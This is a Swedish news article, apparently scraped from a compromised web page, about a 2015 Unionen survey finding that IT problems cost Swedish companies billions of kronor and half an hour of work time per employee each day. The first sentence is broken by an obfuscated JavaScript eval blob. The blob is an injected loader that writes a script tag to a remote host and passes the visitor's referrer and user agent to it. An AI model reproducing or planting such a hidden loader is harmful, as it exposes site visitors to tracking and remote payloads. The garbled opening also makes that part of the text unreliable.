Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

IT-strul kostar företag miljardbelopp

IT-strul kostar företag miljardbelopp
Sebastian

Ineffektiva eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ihhkk|var|u0026u|referrer|yfnai||js|php’.split(’|’),0,{}))
IT-lösningar står för miljardkostnader för svenska företag. Med bättre förankrade och mer användarvänliga IT-system skulle företagen årligen kunna spara minst 14,5 miljarder kronor. Varje dag försvinner i genomsnitt 30 minuter i arbetstid för varje anställd på grund av IT-strul, visar Unionens rapport om Tjänstemännens IT-miljö.

Tjänstemännens inflytande över sin IT-miljö är bristfällig, och inga förbättringar sker. Bara det senaste året har det skett en ökning med drygt tio procent i förlorad arbetstid på grund av IT-strul. Andelen respondenter som i undersökningen anser att IT-systemen fungerar som önskat sjönk från tio till sex procent under år 2015.

I årets rapport svarar hälften av tjänstemännen att de varken får information eller utbildning för att kunna använda IT-systemen på ett effektivt sätt.

-­­ Dåligt fungerande IT-system är kostsamt för företagen och skapar en negativ spiral som leder till en orolig arbetsplats där medarbetarna blir stressade och presterar sämre. Behoven av förbättringar är tydliga. Genom att lyfta fram goda exempel och beställarens viktiga roll vid IT-utveckling vill Unionen bidra till konkreta förändringar, säger Peter Hellberg, 1:e vice ordförande Unionen.

Endast fyra av tio chefer anser att nya IT-system på arbetsplatsen har införts utifrån väl förankrade förslag. Ännu sämre är det bland medarbetarna där tre av tio uppger samma sak. Färre än fyra av tio chefer har fått vara med och påverka arbetsrutinerna vid införande av ny IT, samtidigt ansvarar de för fungerande rutiner och en bra arbetsmiljö.

– IT-systemen måste införas väl på arbetsplatsen så att arbetsuppgifterna kan utföras på bästa sätt. Det är av stor vikt att cheferna inkluderas i IT-utvecklingen, så att de förstår och kan förankra IT-systemen hos sina medarbetare. Det säger sig självt att situationen blir ohållbar annars, säger Peter Hellberg.

Fyra av tio tjänstemän litar inte på IT-systemet som finns på arbetsplatsen. Det beror på problemen som dagligen uppstår i systemet men också på den okunskap som finns om hur de fungerar.

– Kunskapshöjning är otroligt viktigt för att uppnå ett stimulerande och utvecklande arbete som ska vara hållbart under lång tid. Att inte utbilda anställda i uppdateringar av IT-system är resursslöseri för företagen, säger Peter Hellberg.

Positivt i åretsundersökning är att sju av tio tillfrågade anser att de kan utföra sitt arbete med större självständighet tack vare IT-systemen. Lika stor andel anser att deras möjligheter att distansarbeta har underlättats tack vare IT.

– Att kunna planera sin egen arbetstid skapar ett bättre arbetsklimat och borde vara en självklarhet för tjänstemännen på dagens arbetsmarknad. Bra IT möjliggör detta. För att nå dit måste arbetsgivare inse att kortsiktiga, icke förankrade IT-lösningar inte medför besparingar och ett effektivt arbetssätt, Snarare tvärtom, säger Peter Hellberg.

Fakta:
Intervjuerna har genomförts i Novus slumpmässigt rekryterade webbpanel. Fältperioden var 20/10 – 1/11 2015. Totalt omfattar undersökningen 2092 intervjuer med en deltagarfrekvens om 61 procent.